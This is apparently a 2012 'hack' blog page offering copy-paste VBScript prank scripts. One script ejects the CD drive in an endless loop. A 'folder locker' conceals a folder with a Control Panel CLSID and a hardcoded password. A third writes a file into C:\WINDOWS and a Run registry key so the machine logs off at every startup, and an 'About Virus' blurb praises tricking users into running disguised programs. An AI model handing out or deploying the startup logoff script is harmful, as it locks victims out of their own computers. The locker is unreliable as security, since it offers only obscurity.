Breaking News
Loading...
  • My Software(s)
  • Hack News
  • Downloads

My Softwares

Hack News

Downloads

Recent Post

no image

Script to Eject CD Drive Continuously

open notepad and type the following :-
▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼▼
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
do
colCDROMs.Item(i).Eject
wscript.sleep 2000
loop
▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲

Save it as anyname.vbs
This Script will continuously open the CD Rom Drive :-
no image

Create Folder Locker

Create Your own Folder Locker using the following script
open notepad and type the following :-

dim pass,st
set fso=CreateObject("Scripting.FileSystemObject")
if fso.FolderExists("Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}") then
pass=inputbox("Enter Password To Unlock")
if pass="yourpassword" then
set st=fso.getfolder("Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}")
st.name="Locker"
else
wscript.echo "Wrong password Entered....!"
end if
Else
if fso.FolderExists("Locker") then
set st=fso.getfolder("Locker")
st.name="Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
else
fso.CreateFolder("Locker")
end if
end if

Now save the file as locker.vbs
The Script When Executed will create a Folder "Locker". Just put the files in that folder that you want to lock and then again Execute the script!
Note: Replace the "yourpassword" with your own password
no image

Log Off Windows at every Start up

Just open notepad and Type The Following vbscript Code :

set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”


============================================================
Now Save This Script with “anyname.vbs”
Eg:- winfile.vbs
============================================================
About This Script :
This Script Actually Writes a File Named “wscript.vbs” in the “C:\Windows” Directory and Aslo Writes a Key Value in The Registory “HKCU\Software\Microsoft\Windows\CurrentVersion\Run”
Where HKCU is The HKEY_CURRENT_USER.
so that the file is automatically executed at every start up
=============================================================
no image

About Virus

Everybody is scared of computer ‘virus’ as it does harmful actions on our computer. But
when we look into the virus programming, we may certainly come out with the conclusion that it
requires intelligence to code a virus.
Virus program don’t have any specific rules.
But it’s a common practice to include ‘signatures’ by virus creators.

The main idea is to force the innocent user to run the programs. So certain viruses come along with so called ‘programmer utilities’ or ‘free tools’. Another thing is, it is easy to hang-up a working system using some ‘bad’ interrupts!
Copyright © 2012 HackWithMak All Right Reserved